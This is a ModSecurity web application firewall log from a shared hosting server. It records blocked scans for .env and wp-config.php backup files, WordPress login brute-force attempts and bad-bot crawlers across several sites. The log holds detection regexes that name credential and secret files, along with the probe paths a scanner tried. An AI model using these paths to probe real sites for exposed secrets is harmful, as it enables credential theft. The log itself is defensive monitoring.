[Tue May 26 19:10:51.136836 2026] [security2:error] [pid 18465:tid 18686] [client 93.123.109.10:33464] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/cloud/.env"] [unique_id "ahWi406GHndkguR9cLJzuQAAAFo"]
[Tue May 26 19:10:51.136924 2026] [security2:error] [pid 18465:tid 18649] [client 93.123.109.10:33510] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/tmp/.env"] [unique_id "ahWi406GHndkguR9cLJzuAAAADU"]
[Tue May 26 19:10:51.138259 2026] [security2:error] [pid 18465:tid 18681] [client 93.123.109.10:33482] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/temp/.env"] [unique_id "ahWi406GHndkguR9cLJzugAAAFU"]
[Tue May 26 19:10:51.140077 2026] [security2:error] [pid 18465:tid 18680] [client 93.123.109.10:33502] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/master/.env"] [unique_id "ahWi406GHndkguR9cLJzuwAAAFQ"]
[Tue May 26 19:10:51.152051 2026] [security2:error] [pid 18465:tid 18683] [client 93.123.109.10:33408] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/blog/.env"] [unique_id "ahWi406GHndkguR9cLJzvAAAAFc"]
[Tue May 26 19:10:51.152951 2026] [security2:error] [pid 18465:tid 18602] [client 93.123.109.10:33446] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/cgi-bin/.env"] [unique_id "ahWi406GHndkguR9cLJzvQAAAAc"]
[Tue May 26 19:10:51.153171 2026] [security2:error] [pid 18465:tid 18614] [client 93.123.109.10:33460] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/blogs/.env"] [unique_id "ahWi406GHndkguR9cLJzvgAAABM"]
[Tue May 26 19:10:51.164457 2026] [security2:error] [pid 18465:tid 18693] [client 93.123.109.10:33474] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/engine/.env"] [unique_id "ahWi406GHndkguR9cLJzvwAAAGE"]
[Tue May 26 19:10:51.231660 2026] [security2:error] [pid 18465:tid 18651] [client 93.123.109.10:33346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/administrator/.env"] [unique_id "ahWi4k6GHndkguR9cLJzUwAAADc"]
[Tue May 26 19:10:51.250135 2026] [security2:error] [pid 18465:tid 18595] [client 93.123.109.10:33386] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/shop/.env"] [unique_id "ahWi406GHndkguR9cLJzwAAAAAA"]
[Tue May 26 19:10:51.250645 2026] [security2:error] [pid 18465:tid 18682] [client 93.123.109.10:33176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.109.123.93.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/phpinfo.php"] [unique_id "ahWi406GHndkguR9cLJzwgAAAFY"]
[Tue May 26 19:10:51.253203 2026] [security2:error] [pid 18465:tid 18659] [client 93.123.109.10:33146] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/store/.env"] [unique_id "ahWi406GHndkguR9cLJzwwAAAD8"]
[Tue May 26 19:10:51.253557 2026] [security2:error] [pid 18465:tid 18606] [client 93.123.109.10:33394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/cart/.env"] [unique_id "ahWi406GHndkguR9cLJzxAAAAAs"]
[Tue May 26 19:10:51.255753 2026] [security2:error] [pid 18465:tid 18650] [client 93.123.109.10:33300] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/dbadmin/.env"] [unique_id "ahWi406GHndkguR9cLJzwQAAADY"]
[Tue May 26 19:10:51.314197 2026] [security2:error] [pid 18465:tid 18630] [client 93.123.109.10:33374] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/administrator/config/.env"] [unique_id "ahWi4k6GHndkguR9cLJzpAAAACI"]
[Tue May 26 19:10:51.342809 2026] [security2:error] [pid 18465:tid 18673] [client 93.123.109.10:33518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/forum/.env"] [unique_id "ahWi406GHndkguR9cLJzxQAAAE0"]
[Tue May 26 19:10:51.360502 2026] [security2:error] [pid 18465:tid 18687] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWi4k6GHndkguR9cLJziwAAAFs"]
[Tue May 26 19:10:51.369388 2026] [security2:error] [pid 18465:tid 18660] [client 93.123.109.10:33100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/forums/.env"] [unique_id "ahWi406GHndkguR9cLJzygAAAEA"]
[Tue May 26 19:10:53.793414 2026] [security2:error] [pid 18465:tid 18611] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWi5U6GHndkguR9cLJ0HQAAABA"]
[Tue May 26 19:10:55.721680 2026] [security2:error] [pid 18465:tid 18719] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWi506GHndkguR9cLJ0RwAAAHs"]
[Tue May 26 19:10:57.124136 2026] [security2:error] [pid 18465:tid 18627] [client 73.82.23.240:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWi6E6GHndkguR9cLJ0agAAAB8"]
[Tue May 26 19:10:57.565690 2026] [security2:error] [pid 18465:tid 18708] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWi6U6GHndkguR9cLJ0dwAAAHA"]
[Tue May 26 19:10:57.651156 2026] [security2:error] [pid 18465:tid 18631] [client 192.178.8.73:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "atreegroup.com"] [uri "/index.php"] [unique_id "ahWi6E6GHndkguR9cLJ0cAAAACM"]
[Tue May 26 19:10:58.407525 2026] [security2:error] [pid 18465:tid 18540] [remote 54.38.29.86:58710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWi6k6GHndkguR9cLJ0mAAAC0o"]
[Tue May 26 19:10:59.116201 2026] [security2:error] [pid 18465:tid 18683] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWi6k6GHndkguR9cLJ0pwAAAFc"]
[Tue May 26 19:10:59.601270 2026] [security2:error] [pid 18465:tid 18623] [client 45.79.207.181:37777] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWi606GHndkguR9cLJ0uAAAABs"]
[Tue May 26 19:11:01.103360 2026] [security2:error] [pid 18465:tid 18635] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWi7E6GHndkguR9cLJ0zgAAACc"]
[Tue May 26 19:11:01.799139 2026] [security2:error] [pid 18465:tid 18525] [remote 74.7.241.58:40438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWi7U6GHndkguR9cLJ09QAAPDs"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/ru
[Tue May 26 19:11:05.600471 2026] [security2:error] [pid 18465:tid 18468] [remote 51.91.98.45:33982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahWi8U6GHndkguR9cLJ1cwAAcgI"]
[Tue May 26 19:11:05.865035 2026] [security2:error] [pid 18465:tid 18681] [client 92.222.108.122:63242] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "jailanitradingcompany.com"] [uri "/robots.txt"] [unique_id "ahWi8U6GHndkguR9cLJ1iwAAAFU"]
[Tue May 26 19:11:05.865136 2026] [security2:error] [pid 18465:tid 18681] [client 92.222.108.122:63242] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "jailanitradingcompany.com"] [uri "/robots.txt"] [unique_id "ahWi8U6GHndkguR9cLJ1iwAAAFU"]
[Tue May 26 19:11:07.253506 2026] [security2:error] [pid 18465:tid 18674] [client 51.161.37.132:47642] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "jailanitradingcompany.com"] [uri "/"] [unique_id "ahWi806GHndkguR9cLJ1ywAAAE4"]
[Tue May 26 19:11:07.253602 2026] [security2:error] [pid 18465:tid 18674] [client 51.161.37.132:47642] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "jailanitradingcompany.com"] [uri "/"] [unique_id "ahWi806GHndkguR9cLJ1ywAAAE4"]
[Tue May 26 19:11:10.904865 2026] [security2:error] [pid 18465:tid 18581] [remote 74.91.224.220:41742] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWi9k6GHndkguR9cLJ2XQAALnM"]
[Tue May 26 19:11:11.149513 2026] [security2:error] [pid 18465:tid 18583] [remote 51.91.98.45:60822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWi906GHndkguR9cLJ2awAAQ3U"]
[Tue May 26 19:11:11.438789 2026] [security2:error] [pid 18465:tid 18584] [remote 74.91.224.220:41742] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWi906GHndkguR9cLJ2dAAALXY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:11:13.004098 2026] [security2:error] [pid 18465:tid 18587] [remote 141.95.202.18:36776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWi-E6GHndkguR9cLJ2sAAASnk"]
[Tue May 26 19:11:15.158609 2026] [security2:error] [pid 18465:tid 18711] [client 88.99.80.227:33732] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWi-k6GHndkguR9cLJ25wAAAHM"], referer: http://ucdc.co.in/
[Tue May 26 19:11:15.782351 2026] [security2:error] [pid 18465:tid 18498] [remote 141.95.202.18:36776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWi-06GHndkguR9cLJ3MQAAdiA"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 19:11:16.016943 2026] [security2:error] [pid 18465:tid 18652] [client 121.229.156.55:50062] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/"] [unique_id "ahWi_E6GHndkguR9cLJ3RgAAADg"]
[Tue May 26 19:11:16.017068 2026] [security2:error] [pid 18465:tid 18652] [client 121.229.156.55:50062] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/"] [unique_id "ahWi_E6GHndkguR9cLJ3RgAAADg"]
[Tue May 26 19:11:17.752073 2026] [security2:error] [pid 18465:tid 18607] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWi_U6GHndkguR9cLJ3mAAAAAw"]
[Tue May 26 19:11:18.489907 2026] [security2:error] [pid 18465:tid 18540] [remote 40.77.167.154:15001] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 154.167.77.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "acacia.org.in"] [uri "/acacia-web-disclaimer.php"] [unique_id "ahWi_k6GHndkguR9cLJ30AAAQ0o"]
[Tue May 26 19:11:19.271333 2026] [security2:error] [pid 18465:tid 18704] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWi_k6GHndkguR9cLJ36wAAAGw"]
[Tue May 26 19:11:20.739743 2026] [security2:error] [pid 18465:tid 18628] [client 71.204.38.253:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjAE6GHndkguR9cLJ4OQAAACA"]
[Tue May 26 19:11:20.893815 2026] [security2:error] [pid 18465:tid 18486] [remote 103.145.62.145:40933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.62.145.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjAE6GHndkguR9cLJ4UQAANhQ"]
[Tue May 26 19:11:21.479914 2026] [security2:error] [pid 18465:tid 18469] [remote 103.145.62.145:40933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.62.145.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjAU6GHndkguR9cLJ4dwAAZwM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:11:22.337882 2026] [security2:error] [pid 18465:tid 18620] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjAU6GHndkguR9cLJ4lwAAABg"]
[Tue May 26 19:11:23.487071 2026] [security2:error] [pid 18465:tid 18712] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjA06GHndkguR9cLJ41AAAAHQ"]
[Tue May 26 19:11:25.392537 2026] [security2:error] [pid 18465:tid 18607] [client 93.123.109.10:55432] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "bhavisharchitects.com"] [uri "/wp-config.php-backup"] [unique_id "ahWjBU6GHndkguR9cLJ5aAAAAAw"]
[Tue May 26 19:11:25.392850 2026] [security2:error] [pid 18465:tid 18653] [client 93.123.109.10:55268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.109.123.93.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/pi.php"] [unique_id "ahWjBU6GHndkguR9cLJ5ZgAAADk"]
[Tue May 26 19:11:25.393039 2026] [security2:error] [pid 18465:tid 18611] [client 93.123.109.10:55424] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "bhavisharchitects.com"] [uri "/wp-config.php.old"] [unique_id "ahWjBU6GHndkguR9cLJ5aQAAABA"]
